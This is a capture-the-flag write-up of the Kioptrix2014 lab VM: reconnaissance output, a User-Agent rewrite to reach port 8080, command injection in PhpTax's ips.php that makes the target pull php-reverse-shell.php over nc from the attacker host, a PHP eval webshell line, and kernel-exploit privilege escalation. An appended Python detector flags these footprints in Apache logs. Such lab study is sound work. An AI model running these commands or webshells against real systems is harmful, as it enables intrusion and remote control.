Vulnhub Kioptrix2014 Writeup

Talk is cheap, show me writeup

Tools and knowledge used

nmap, dirb, nikto, Google, searchsploit, LFI, BurpSuite, netcat

Target VM download

0x00 Preliminary issue

  • After the VM starts, nmap cannot find its IP, and even rebooting and switching to NAT mode does not help?
    • Remove the network adapter from the VM settings, add it again, and set it to NAT or bridged
    • blog

0x01 Information gathering

Basic information with nmap

Ports 80 and 8080 are open

Visiting port 80

Port 8080

Port 8080 cannot be accessed for now (403)

Continue gathering information with tools

We use the directory brute-forcing tools dirb, nikto and whatweb

```text
# dirb common.txt scan results:
80
+ http://192.168.206.141:80/cgi-bin/ (CODE:403|SIZE:210)
+ http://192.168.206.141:80/index.html (CODE:200|SIZE:152)

8080
+ http://192.168.206.141:8080/cgi-bin/ (CODE:403|SIZE:210)

# whatweb scan results:
80
# http://192.168.206.141:80
[200 OK] Apache[2.2.21][mod_ssl/2.2.21], Country[RESERVED][ZZ], HTTPServer[FreeBSD][Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8], IP[192.168.206.141], Meta-Refresh-Redirect[pChart2.1.3/index.php], OpenSSL[0.9.8q], PHP[5.3.8], WebDAV[2]

# http://192.168.206.141/pChart2.1.3/index.php
[302 Found] Apache[2.2.21][mod_ssl/2.2.21], Country[RESERVED][ZZ], HTTPServer[FreeBSD][Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8], IP[192.168.206.141], OpenSSL[0.9.8q], PHP[5.3.8], RedirectLocation[examples/index.php], WebDAV[2], X-Powered-By[PHP/5.3.8]

# http://192.168.206.141/pChart2.1.3/examples/index.php
[200 OK] Apache[2.2.21][mod_ssl/2.2.21], Country[RESERVED][ZZ], HTTPServer[FreeBSD][Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8], IP[192.168.206.141], OpenSSL[0.9.8q], PHP[5.3.8], Script, Title[pChart 2.x - examples rendering], WebDAV[2], X-Powered-By[PHP/5.3.8]

8080
# http://192.168.206.141:8080
[403 Forbidden] Apache[2.2.21][mod_ssl/2.2.21], Country[RESERVED][ZZ], HTTPServer[FreeBSD][Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8], IP[192.168.206.141], OpenSSL[0.9.8q], PHP[5.3.8], Title[403 Forbidden], WebDAV[2]

# nikto scan results:
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.206.141
+ Target Hostname: 192.168.206.141
+ Target Port: 80
+ Start Time: 2020-03-10 14:34:38 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sun Mar 30 01:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ 8345 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2020-03-10 14:35:54 (GMT8) (76 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```

The whatweb scan of port 80 turned up http://192.168.206.141/pChart2.1.3/index.php, so let's visit it

It is a chart-rendering page (written in PHP), which should be the entry point to the target. Looking further, you can click the corresponding buttons to read each example's source, and every example starts by including the library's PHP files

Visiting http://192.168.206.141/pChart2.1.3/class/ gives the following page

Since one path has shown up, there are probably more reachable paths than this one, so I continue scanning from that base with dirb and nikto

```text
$ dirb http://192.168.206.141/pChart2.1.3/
# dirb scan results:
START_TIME: Tue Mar 10 14:59:28 2020
URL_BASE: http://192.168.206.141/pChart2.1.3/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.206.141/pChart2.1.3/ ----
==> DIRECTORY: http://192.168.206.141/pChart2.1.3/cache/
==> DIRECTORY: http://192.168.206.141/pChart2.1.3/class/
==> DIRECTORY: http://192.168.206.141/pChart2.1.3/data/
==> DIRECTORY: http://192.168.206.141/pChart2.1.3/examples/
==> DIRECTORY: http://192.168.206.141/pChart2.1.3/fonts/
+ http://192.168.206.141/pChart2.1.3/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.206.141/pChart2.1.3/cache/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.206.141/pChart2.1.3/class/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.206.141/pChart2.1.3/data/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.206.141/pChart2.1.3/examples/ ----
+ http://192.168.206.141/pChart2.1.3/examples/index.php (CODE:200|SIZE:86764)
==> DIRECTORY: http://192.168.206.141/pChart2.1.3/examples/pictures/
==> DIRECTORY: http://192.168.206.141/pChart2.1.3/examples/resources/
==> DIRECTORY: http://192.168.206.141/pChart2.1.3/examples/sandbox/

---- Entering directory: http://192.168.206.141/pChart2.1.3/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.206.141/pChart2.1.3/examples/pictures/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.206.141/pChart2.1.3/examples/resources/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.206.141/pChart2.1.3/examples/sandbox/ ----
==> DIRECTORY: http://192.168.206.141/pChart2.1.3/examples/sandbox/includes/
+ http://192.168.206.141/pChart2.1.3/examples/sandbox/index.php (CODE:200|SIZE:45314)
==> DIRECTORY: http://192.168.206.141/pChart2.1.3/examples/sandbox/script/

---- Entering directory: http://192.168.206.141/pChart2.1.3/examples/sandbox/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.206.141/pChart2.1.3/examples/sandbox/script/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Tue Mar 10 15:01:35 2020
DOWNLOADED: 13836 - FOUND: 3

# nikto scan results:
---------------------------------------------------------------------------
+ Target IP: 192.168.206.141
+ Target Hostname: 192.168.206.141
+ Target Port: 80
+ Start Time: 2020-03-10 14:59:15 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Retrieved x-powered-by header: PHP/5.3.8
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: examples/index.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ OSVDB-12184: /pChart2.1.3/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /pChart2.1.3/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /pChart2.1.3/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /pChart2.1.3/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /pChart2.1.3/data/: Directory indexing found.
+ OSVDB-3092: /pChart2.1.3/data/: This might be interesting...
+ Server leaks inodes via ETags, header found with file /pChart2.1.3/readme.txt, inode: 505755, size: 12220, mtime: Fri Sep 9 16:48:27 2011
+ OSVDB-3092: /pChart2.1.3/readme.txt: This might be interesting...
+ 7536 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2020-03-10 15:00:45 (GMT8) (90 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```

The nikto results include links such as /pChart2.1.3/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000. Visiting them, some are images and one is the so-called phpinfo

This PHP Credits page only lists module names and author names, nothing else. I wondered whether I had a blind spot around phpinfo and googled for a while, to no real effect. (First rabbit hole)

Stuck, so I went online to consult walkthroughs

  • My search thinking and Google skills were still lacking; I had not made the mental turn. Since I knew nothing about certain components, the vulnerabilities in those components were simply skipped over
  • I should have kept asking myself: do I understand this chart module (written in PHP)? Could it be a widely used library? Does it have known vulnerabilities?

0x02 Vulnerability discovery and exploitation

Following this line of thought, I continued googling

You can also use searchsploit directly on Kali, although it is less likely to hit than Google, so keep an optimistic calm

I tested the two PoCs; they run, but I was again stuck not knowing what to do next. The cause was still not understanding the environment and which information matters for the penetration, so I distilled keywords from the ideas above: apache sensitive information, apache 2.2.21 sensitive information, PHP 5.3.8 sensitive information, Apache default paths

Found the following two useful pieces of information:

Apache default paths on various OSes

Sensitive information gathering

After another round of testing with no sign of progress (inefficient, so either write a script or gather more useful information), I finally found a useful sensitive configuration file

It is not long. After carefully reading the non-comment lines, it turns out port 8080 is inaccessible because it is configured to only let through browsers that identify as Mozilla/4

Good, at this step I thought of modifying the User-Agent. Using Burp, change Mozilla/5.0 to 4.0 and the page on 8080 becomes visible

But I will need to keep accessing this port, and changing it by hand every time is not practical, so I use Match and Replace to modify every request passing through Burp

OK, click index and move on to the next step: it is PhpTax. With the experience gained, continue with the methodology summarized earlier: Google & searchsploit

Find the vulnerable version and its exploit

Copy the PHP exploit out of the txt, save it, and run it with the parameters

Error: curl_init() is undefined. Google how to enable it

Edit php.ini and remove the ; in front of ;extension=curl, then run again as in the figure above; searching showed there was no curl shared library (so on Linux, dll on Windows)

After about 2 hours of debugging and installing (because I am on a 2018 Kali 😭), I finally saw the picture below

unsuccessful! So I switch exploits and use /usr/share/exploitdb/exploits/php/webapps/21665.txt

Kept failing. After a break I decided to read the exploit's source, copied the URL into the browser, and the request succeeded

When trying the next step, it said rce.php does not exist; uploading the shell failed. Do I really have to use msf? No way. Continue directory brute-forcing under /phptax/

Visiting the paths one by one, I found that our PHP shell had indeed been written under phptax/data/, but it could not be executed; the phptax/data/pdf path also had something interesting

Consult the walkthroughs again!

Some predecessors could execute commands while others could not. They also found that the target has no bash and no python, only sh, yet accessing it directly via the URL still did not work, and telnet failed too. (Of course msf still takes it in one go)

The methods that worked for them:

  • perl (reverse shell with perl)
  • To write a webshell, you must escape $ with \, e.g. `echo @eval(\$_POST['psw']);`

I followed the second method

Information can be queried directly, but a direct connection still fails (nc drops instantly)

So let's try transferring php-reverse-shell.php with nc (ftp works too). Find it under /usr/share/webshells/php/ and edit the IP and port

```text
# kali: send
nc -lvp 4444 < php-reverse-shell.php
# url: target receives
192.168.206.141:8080/phptax/ips.php?m=nc%20192.168.206.140%201234%20%3E%20php-reverse-shell.php
```

Received successfully! Start a listener on Kali and visit shell.php in the browser

0x03 Privilege escalation & GetFlag

Privilege escalation is simple: search for an exploit using the OS version, FreeBSD, as the keyword

Change to /tmp, transfer the exploit to the target with nc, compile it with gcc and run it to get root

Find congrats.txt under /root

0x04 Summary

  • Keep asking what information you have, what it applies to, whether you know that area, whether it could be vulnerable, and distil keywords to Google
  • Every classic vulnerability class spawns all kinds of derived tricks; to keep getting proficient and dig deeper into them, beyond understanding the principles thoroughly you must keep actively accumulating experience
    • For example, reproduce the exploitation techniques and reference material for different scenarios
    • Another analogy: in competitions or tests you run into arbitrary file read or directory traversal vulnerabilities and can read sensitive files to get further, so gathering such information is not aimless; it is precisely because a vulnerability pairs with it that we learn and collect it in the first place
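Seen from the server side, the steps above leave a clear footprint in the Apache access log: a traversal sequence in a pChart query parameter, shell syntax in the ips.php?m= parameter, and one client presenting both Mozilla/5.0 and Mozilla/4.0 after the Burp rewrite. The detector below is an added example, not code from the original post; the sample log lines are constructed, and the Script parameter name and the FreeBSD httpd.conf path in them are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit, parse_qsl

# Apache "combined" log format; the 8080 vhost would normally log to its own file.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# "../" anywhere in a parameter value; shell metacharacters or small helpers in a value.
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')
COMMAND_RE = re.compile(r'[;|&`$<>]|(^|\s)(nc|sh|perl|telnet)(\s|$)')

# Constructed sample lines. The Script parameter and the FreeBSD httpd.conf path are
# assumptions; the ips.php?m= request mirrors the URL used in the writeup above.
SAMPLE_LOG = """\
192.168.206.140 - - [10/Mar/2020:15:02:11 +0800] "GET /pChart2.1.3/examples/index.php HTTP/1.1" 200 86764 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
192.168.206.140 - - [10/Mar/2020:15:03:42 +0800] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%252e%252e/%252e%252e/%252e%252e/%252e%252e/usr/local/etc/apache22/httpd.conf HTTP/1.1" 200 12220 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
192.168.206.140 - - [10/Mar/2020:15:20:05 +0800] "GET /phptax/ips.php?m=nc%20192.168.206.140%201234%20%3E%20php-reverse-shell.php HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
192.168.206.140 - - [10/Mar/2020:15:21:00 +0800] "GET /phptax/index.php HTTP/1.1" 200 4510 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
"""


def scan_log(text):
    """Return (ip, path, finding) tuples for suspicious requests and UA switching."""
    hits = []
    ua_families = defaultdict(set)          # ip -> {"Mozilla/4.0", "Mozilla/5.0", ...}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                         # not combined format: skip rather than guess
        ua_families[m['ip']].add((m['ua'].split() or ['-'])[0])
        parts = urlsplit(m['path'])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = unquote(value)           # parse_qsl decoded once; catch double encoding
            if TRAVERSAL_RE.search(value):
                hits.append((m['ip'], parts.path, f'path traversal in parameter {name!r}'))
            if COMMAND_RE.search(value):
                hits.append((m['ip'], parts.path, f'shell command in parameter {name!r}'))
    # One client presenting several UA families is the footprint of a proxy rewrite rule;
    # on this box the 8080 vhost keyed access on the UA string, which the client controls.
    for ip, families in ua_families.items():
        if len(families) > 1:
            hits.append((ip, '*', 'client switched User-Agent family: ' + ', '.join(sorted(families))))
    return hits


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(*hit, sep='  ')
```

Pointing it at the real access_log of both vhosts would surface the same three findings; a User-Agent allow rule should be treated as a hint, not as access control.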

0x05 References

Kioptrix 2014

Kioptrix2014 (#5)

Hacking Kioptrix 2014


Unless otherwise stated, all articles on this blog are licensed under CC BY-SA 4.0; please credit the source when reposting!